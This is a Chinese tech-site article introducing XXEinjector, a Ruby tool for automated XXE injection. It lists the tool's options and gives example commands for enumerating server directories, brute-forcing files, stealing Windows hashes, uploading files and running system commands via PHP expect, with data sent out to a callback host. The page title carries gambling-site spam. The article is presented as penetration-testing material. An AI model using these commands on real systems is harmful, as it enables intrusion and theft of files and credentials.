? XXEinjector:一款功能强大的自动化XXE注射工具_CQITer_重庆IT人之家 亚博APP入口,亚博vip体育官网,yabo88亚博app ?

XXEinjector:一款功能强大的自动化XXE注射工具

?

XXEinjector到底是一款怎样的注入工具?

?

今天给大家介绍的是一款名叫XXEinjector的漏洞利用工具,XXEinjector是一款基于Ruby的XXE注入工具,它可以使用多种直接或间接带外方法来检索文件。其中,目录枚举功能只对Java应用程序有效,而暴力破解攻击需要使用到其他应用程序。

XXEinjector注入工具的使用

XXEinjector本身提供了非常非常丰富的操作选项,所以大家在利用XXEinjector进行渗透测试之前,请自习了解这些配置选项,以最大限度地发挥XXEinjector的功能。当然了,由于XXEinjector是基于Ruby开发的,所以Ruby运行环境就是必须的了。

?

XXEinjector注入工具在ruby当中是如何使用的

?

?

--host? ? ?必填项– 用于建立反向链接的IP地址。(--host=192.168.0.2)
--file? ? ? 必填项- 包含有效HTTP请求的XML文件。(--file=/tmp/req.txt)
--path? ? ? ? ? ?必填项-是否需要枚举目录 – 枚举路径。(--path=/etc)
--brute? ? ? ? ? 必填项-是否需要爆破文件 -爆破文件的路径。(--brute=/tmp/brute.txt)
--logger? ? ? ? 记录输出结果。
--rhost? ? ? ? ? 远程主机IP或域名地址。(--rhost=192.168.0.3)
--rport? ? ? ? ? 远程主机的TCP端口信息。(--rport=8080)
--phpfilter? ? 在发送消息之前使用PHP过滤器对目标文件进行Base64编码。
--netdoc? ? ?使用netdoc协议。(Java).
--enumports? ?枚举用于反向链接的未过滤端口。(--enumports=21,22,80,443,445)
--hashes? ? ? ?窃取运行当前应用程序用户的Windows哈希。
--expect? ? ? ? 使用PHP expect扩展执行任意系统命令。(--expect=ls)
--upload? ? ? ?使用Java jar向临时目录上传文件。(--upload=/tmp/upload.txt)
--xslt? ? ? XSLT注入测试。
--ssl? ? ? ? ? ? ? 使用SSL。
--proxy? ? ? ? ?使用代理。(--proxy=127.0.0.1:8080)
--httpport Set自定义HTTP端口。(--httpport=80)
--ftpport? ? ? ?设置自定义FTP端口。(--ftpport=21)
--gopherport? 设置自定义gopher端口。(--gopherport=70)
--jarport? ? ? ?设置自定义文件上传端口。(--jarport=1337)
--xsltport? 设置自定义用于XSLT注入测试的端口。(--xsltport=1337)
--test? ? ?该模式可用于测试请求的有效。
--urlencode? ? ?URL编码,默认为URI。
--output? ? ? ?爆破攻击结果输出和日志信息。(--output=/tmp/out.txt)
--timeout? ? ?设置接收文件/目录内容的Timeout。(--timeout=20)
--contimeout? 设置与服务器断开连接的,防止DoS出现。(--contimeout=20)
--fast? ? ?跳过枚举询问,有可能出现结果假阳性。
--verbose? ? ?显示verbose信息。

?

如果你现在还对XXE攻击不是很了解的话,推荐大家先阅读下面这篇文章:《XXE注入攻击-XML外部实体漏洞及样本分析》。

XXEinjector使用样例

枚举HTTPS应用程序中的/etc目录:

ruby XXEinjector.rb --host=192.168.0.2 --path=/etc --file=/tmp/req.txt –ssl

使用gopher(OOB方法)枚举/etc目录:

ruby XXEinjector.rb --host=192.168.0.2 --path=/etc --file=/tmp/req.txt --oob=gopher

二次漏洞利用:

ruby XXEinjector.rb --host=192.168.0.2 --path=/etc --file=/tmp/vulnreq.txt--2ndfile=/tmp/2ndreq.txt

使用HTTP带外方法和netdoc协议对文件进行爆破攻击:

ruby XXEinjector.rb --host=192.168.0.2 --brute=/tmp/filenames.txt--file=/tmp/req.txt --oob=http –netdoc

通过直接性漏洞利用方式进行资源枚举:

ruby XXEinjector.rb --file=/tmp/req.txt --path=/etc --direct=UNIQUEMARK

枚举未过滤的端口:

ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --enumports=all

窃取Windows哈希:

ruby XXEinjector.rb--host=192.168.0.2 --file=/tmp/req.txt –hashes

使用Java jar上传文件:

ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt--upload=/tmp/uploadfile.pdf

使用PHP expect执行系统指令:

ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --oob=http --phpfilter--expect=ls

测试XSLT注入:

ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt –xslt

记录请求信息:

ruby XXEinjector.rb --logger --oob=http--output=/tmp/out.txt

XXEinjector下载地址:(github托管下载)

XXEinjector-master.zip

相关推荐
新闻聚焦
猜你喜欢
热门推荐
  • 微软AI面试题有多难?这里有一份样卷

      究竟什么样的AI人才能被微软这样的巨头聘用呢?今天,文摘君就淘来了几道微软AI 面试题,同时给出了最基本的解答......

    06-25????来源:澎湃新闻网

    分享
  • 全球最聪明的大脑怎么看AI?他们预测了

      2017年AI领域取得了诸多成果。2018年AI又将何去何从?以下是来自世界顶级研究人员和行业领军人物对2018年AI领域发展作......

    02-20????来源:虎嗅网

    分享
  • 2017JavaScript框架战报 - React分战场

      我们来看看与React有关的软件包的生态系统。当Facebook构建React时,就有许多来自开源社区的第三方软件包。为提供完......

    02-27????来源:湖北新闻网

    分享
  • 小白学数据:教你用Python实现简单监督学

      监督学习作为运用最广泛的机器学习方法,一直以来都是从数据挖掘信息的重要手段。即便是在无监督学习兴起的近......

    03-05????来源:今日头条

    分享
  • 现代编程语言Swift、Kotlin等十大有趣功能

      最近学习了一些现代编程语言,比如Reason,Swift,Kotlin和Dart。这些编程语言提供了许多新功能,本文主要分享了我认......

    04-29????来源:祁东新闻网

    分享
  • 领域场景分析的6W模型

      组成场景的要素常常被称之为6W模型,即描写场景的过程必须包含Who,What,Why,Where,When与hoW这六个要素。......

    04-30????来源:砍柴网

    分享
  • 开源应用服务器WildFly 12发新季度交付模式

      WildFly 12 Final版本现在已经可以下载了,WildFly是一款灵活的开源应用服务器,支持开发人员构建轻量级应用程序。支持......

    05-10????来源:青岛新闻网

    分享
  • 基于Spring Cloud的微服务落地

      微服务架构模式的核心在于如何识别服务的边界,设计出合理的微服务。但如果要将微服务架构运用到生产项目上,......

    06-04????来源:广西新闻网

    分享
  • 为什么阿里工程师纷纷在内网晒代码?

      前阵子,在阿里一个小黑屋里,5名对代码有着极致追求的工程师参与阿里代码领域最高荣誉“多隆奖”的最终角逐。......

    06-08????来源:四川新闻网

    分享
  • 超级大汇总!200多个最好的机器学习、

      我把这篇文章分为了四个部分:机器学习,自然语言处理,python和数学。在每个部分中我都列举了一些主题,但是因......

    09-25????来源:洛阳新闻网

    分享
返回列表
Ctrl+D?将本页面保存为书签,全面了解最新资讯,方便快捷。